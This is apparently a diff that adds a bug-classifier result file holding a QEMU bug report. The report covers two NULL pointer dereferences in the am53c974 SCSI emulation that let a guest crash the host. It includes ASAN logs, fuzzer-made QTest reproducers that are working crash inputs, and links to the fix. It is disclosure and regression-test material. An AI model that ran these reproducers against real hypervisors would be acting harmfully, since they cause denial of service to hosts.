diff options
Diffstat (limited to 'results/classifier/118/none/1910723')
| -rw-r--r-- | results/classifier/118/none/1910723 | 251 |
1 files changed, 251 insertions, 0 deletions
diff --git a/results/classifier/118/none/1910723 b/results/classifier/118/none/1910723 new file mode 100644 index 000000000..ae8c7a448 --- /dev/null +++ b/results/classifier/118/none/1910723 @@ -0,0 +1,251 @@ +graphic: 0.769 +arm: 0.694 +peripherals: 0.683 +ppc: 0.668 +risc-v: 0.664 +architecture: 0.664 +register: 0.662 +semantic: 0.653 +assembly: 0.646 +KVM: 0.633 +virtual: 0.632 +TCG: 0.623 +x86: 0.604 +vnc: 0.598 +hypervisor: 0.576 +VMM: 0.569 +user-level: 0.566 +device: 0.562 +performance: 0.557 +mistranslation: 0.556 +permissions: 0.543 +PID: 0.519 +debug: 0.481 +kernel: 0.468 +boot: 0.463 +network: 0.445 +files: 0.401 +socket: 0.360 +i386: 0.287 + +NULL pointer dereference issues in am53c974 SCSI host bus adapter + +Two NULL pointer dereference issues were found in the am53c974 SCSI host bus adapter emulation of QEMU. They could occur while handling the 'Information Transfer' command (CMD_TI) in function handle_ti() in hw/scsi/esp.c, and could be abused by a malicious guest to crash the QEMU process on the host resulting in a denial of service. + +Both issues were reported by Cheolwoo Myung (Seoul National University). To reproduce them, configure and run QEMU as follows. Please find attached the required disk images. + +$ ./configure --target-list=x86_64-softmmu --enable-kvm --enable-sanitizers +$ make +$ ./qemu-system-x86_64 -m 512 -drive file=./hyfuzz.img,index=0,media=disk,format=raw \ +-device am53c974,id=scsi -device scsi-hd,drive=SysDisk \ +-drive id=SysDisk,if=none,file=./disk.img + +Additional info: +RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909766 +RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909769 + +ASAN logs: +==672133== +hw/scsi/scsi-bus.c:1385:12: runtime error: member access within null pointer of type 'struct SCSIRequest' +AddressSanitizer:DEADLYSIGNAL +================================================================= +==672133==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000171 (pc 0x55bd63e20b85 bp 0x7f4b6fffdfa0 sp 0x7f4b6fffdf70 T7) +==672133==The signal is caused by a READ memory access. +==672133==Hint: address points to the zero page. + #0 0x55bd63e20b85 in scsi_req_continue hw/scsi/scsi-bus.c:1385 + #1 0x55bd63ab34fb in esp_do_dma hw/scsi/esp.c:453 + #2 0x55bd63ab4b3c in handle_ti hw/scsi/esp.c:549 + #3 0x55bd63ab72a9 in esp_reg_write hw/scsi/esp.c:691 + #4 0x55bd63d7b5dd in esp_pci_io_write hw/scsi/esp-pci.c:206 + #5 0x55bd645d55a3 in memory_region_write_accessor softmmu/memory.c:491 + #6 0x55bd645d5a24 in access_with_adjusted_size softmmu/memory.c:552 + #7 0x55bd645e2baa in memory_region_dispatch_write softmmu/memory.c:1501 + #8 0x55bd646b75ff in flatview_write_continue softmmu/physmem.c:2759 + #9 0x55bd646b79d1 in flatview_write softmmu/physmem.c:2799 + #10 0x55bd646b8341 in address_space_write softmmu/physmem.c:2891 + #11 0x55bd646b83f9 in address_space_rw softmmu/physmem.c:2901 + #12 0x55bd648c4736 in kvm_handle_io accel/kvm/kvm-all.c:2285 + #13 0x55bd648c69c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531 + #14 0x55bd647b2413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49 + #15 0x55bd64f560de in qemu_thread_start util/qemu-thread-posix.c:521 + #16 0x7f4b981763f8 in start_thread (/lib64/libpthread.so.0+0x93f8) + #17 0x7f4b980a3902 in __GI___clone (/lib64/libc.so.6+0x101902) + +--- + +==672020== +hw/scsi/esp.c:196:62: runtime error: member access within null pointer of type 'struct SCSIDevice' +AddressSanitizer:DEADLYSIGNAL +================================================================= +==672020==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000098 (pc 0x559bc99946fd bp 0x7f08bd737fb0 sp 0x7f08bd737f70 T7) +==672020==The signal is caused by a READ memory access. +==672020==Hint: address points to the zero page. + #0 0x559bc99946fd in do_busid_cmd hw/scsi/esp.c:196 + #1 0x559bc9994e71 in do_cmd hw/scsi/esp.c:220 + #2 0x559bc999ae81 in handle_ti hw/scsi/esp.c:555 + #3 0x559bc999d2a9 in esp_reg_write hw/scsi/esp.c:691 + #4 0x559bc9c615dd in esp_pci_io_write hw/scsi/esp-pci.c:206 + #5 0x559bca4bb5a3 in memory_region_write_accessor softmmu/memory.c:491 + #6 0x559bca4bba24 in access_with_adjusted_size softmmu/memory.c:552 + #7 0x559bca4c8baa in memory_region_dispatch_write softmmu/memory.c:1501 + #8 0x559bca59d5ff in flatview_write_continue softmmu/physmem.c:2759 + #9 0x559bca59d9d1 in flatview_write softmmu/physmem.c:2799 + #10 0x559bca59e341 in address_space_write softmmu/physmem.c:2891 + #11 0x559bca59e3f9 in address_space_rw softmmu/physmem.c:2901 + #12 0x559bca7aa736 in kvm_handle_io accel/kvm/kvm-all.c:2285 + #13 0x559bca7ac9c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531 + #14 0x559bca698413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49 + #15 0x559bcae3c0de in qemu_thread_start util/qemu-thread-posix.c:521 + #16 0x7f08e57ba3f8 in start_thread (/lib64/libpthread.so.0+0x93f8) + #17 0x7f08e56e7902 in __GI___clone (/lib64/libc.so.6+0x101902) + + + +QTest Reproducer for the first: +/* + * Autogenerated Fuzzer Test Case + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "qemu/osdep.h" + +#include "libqos/libqtest.h" + +/* + * cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, -m \ + * 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \ + * id=disk0,if=none,file=null-co://,format=raw -nodefaults -qtest stdio + * outl 0xcf8 0x80001010 + * outl 0xcfc 0xc000 + * outl 0xcf8 0x80001004 + * outw 0xcfc 0x05 + * outb 0xc046 0x02 + * outl 0xc00b 0xc100 + * outl 0xc040 0x03 + * outl 0xc040 0x03 + * write 0x0 0x1 0x41 + * outl 0xc00b 0xc100 + * outw 0xc040 0x02 + * outw 0xc040 0x81 + * outl 0xc00b 0x9000 + * EOF + */ +static void test_fuzz(void) +{ + QTestState *s = qtest_init( + "-display none , -m 512M -device am53c974,id=scsi -device " + "scsi-hd,drive=disk0 -drive " + "id=disk0,if=none,file=null-co://,format=raw -nodefaults"); + qtest_outl(s, 0xcf8, 0x80001010); + qtest_outl(s, 0xcfc, 0xc000); + qtest_outl(s, 0xcf8, 0x80001004); + qtest_outw(s, 0xcfc, 0x05); + qtest_outb(s, 0xc046, 0x02); + qtest_outl(s, 0xc00b, 0xc100); + qtest_outl(s, 0xc040, 0x03); + qtest_outl(s, 0xc040, 0x03); + qtest_bufwrite(s, 0x0, "\x41", 0x1); + qtest_outl(s, 0xc00b, 0xc100); + qtest_outw(s, 0xc040, 0x02); + qtest_outw(s, 0xc040, 0x81); + qtest_outl(s, 0xc00b, 0x9000); + qtest_quit(s); +} +int main(int argc, char **argv) +{ + const char *arch = qtest_get_arch(); + + g_test_init(&argc, &argv, NULL); + + if (strcmp(arch, "i386") == 0) { + qtest_add_func("fuzz/test_fuzz", test_fuzz); + } + + return g_test_run(); +} + +QTest Reproducer for the second: +/* + * Autogenerated Fuzzer Test Case + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * later. See the COPYING file in the top-level directory. + */ + +#include "qemu/osdep.h" + +#include "libqos/libqtest.h" + +/* + * cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, \ + * -m 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \ + * id=disk0,if=none,file=null-co://,format=raw -nodefaults -qtest stdio + * outl 0xcf8 0x80001001 + * outl 0xcfc 0x01000000 + * outl 0xcf8 0x8000100e + * outl 0xcfc 0xef800000 + * outl 0xef8b 0x4100 + * outw 0xef80 0x01 + * outl 0xefc0 0x03 + * outl 0xef8b 0xc100 + * outl 0xef8b 0x9000 + * EOF + */ +static void test_fuzz(void) +{ + QTestState *s = qtest_init( + "-display none , -m 512M -device am53c974,id=scsi -device " + "scsi-hd,drive=disk0 -drive " + "id=disk0,if=none,file=null-co://,format=raw -nodefaults"); + qtest_outl(s, 0xcf8, 0x80001001); + qtest_outl(s, 0xcfc, 0x01000000); + qtest_outl(s, 0xcf8, 0x8000100e); + qtest_outl(s, 0xcfc, 0xef800000); + qtest_outl(s, 0xef8b, 0x4100); + qtest_outw(s, 0xef80, 0x01); + qtest_outl(s, 0xefc0, 0x03); + qtest_outl(s, 0xef8b, 0xc100); + qtest_outl(s, 0xef8b, 0x9000); + qtest_quit(s); +} +int main(int argc, char **argv) +{ + const char *arch = qtest_get_arch(); + + g_test_init(&argc, &argv, NULL); + + if (strcmp(arch, "i386") == 0) { + qtest_add_func("fuzz/test_fuzz", test_fuzz); + } + + return g_test_run(); +} + +Thank you both for the reproducers. Please see the proposed patchset here: + +https://lists.gnu.org/archive/html/qemu-devel/2021-03/msg06063.html + + +I can confirm this is fixed now, thank you Mark. + +Patchset v2: +https://lists.gnu.org/archive/html/qemu-devel/2021-03/msg06550.html + +Patchset v4: +https://lists.gnu.org/archive/html/qemu-devel/2021-04/msg01000.html + +Upstream commits: +https://git.qemu.org/?p=qemu.git;a=commit;h=0db895361b8a82e1114372ff9f4857abea605701 +https://git.qemu.org/?p=qemu.git;a=commit;h=e392255766071c8cac480da3a9ae4f94e56d7cbc +https://git.qemu.org/?p=qemu.git;a=commit;h=e5455b8c1c6170c788f3c0fd577cc3be53539a99 +https://git.qemu.org/?p=qemu.git;a=commit;h=c5fef9112b15c4b5494791cdf8bbb40bc1938dd3 +https://git.qemu.org/?p=qemu.git;a=commit;h=7b320a8e67a534925048cbabfa51431e0349dafd +https://git.qemu.org/?p=qemu.git;a=commit;h=99545751734035b76bd372c4e7215bb337428d89 +https://git.qemu.org/?p=qemu.git;a=commit;h=fa7505c154d4d00ad89a747be2eda556643ce00e +https://git.qemu.org/?p=qemu.git;a=commit;h=fbc6510e3379fa8f8370bf71198f0ce733bf07f9 +https://git.qemu.org/?p=qemu.git;a=commit;h=0ebb5fd80589835153a0c2baa1b8cc7a04e67a93 +https://git.qemu.org/?p=qemu.git;a=commit;h=324c8809897c8c53ad05c3a7147d272f1711cd5e +https://git.qemu.org/?p=qemu.git;a=commit;h=607206948cacda4a80be5b976dba490970a18a76 + |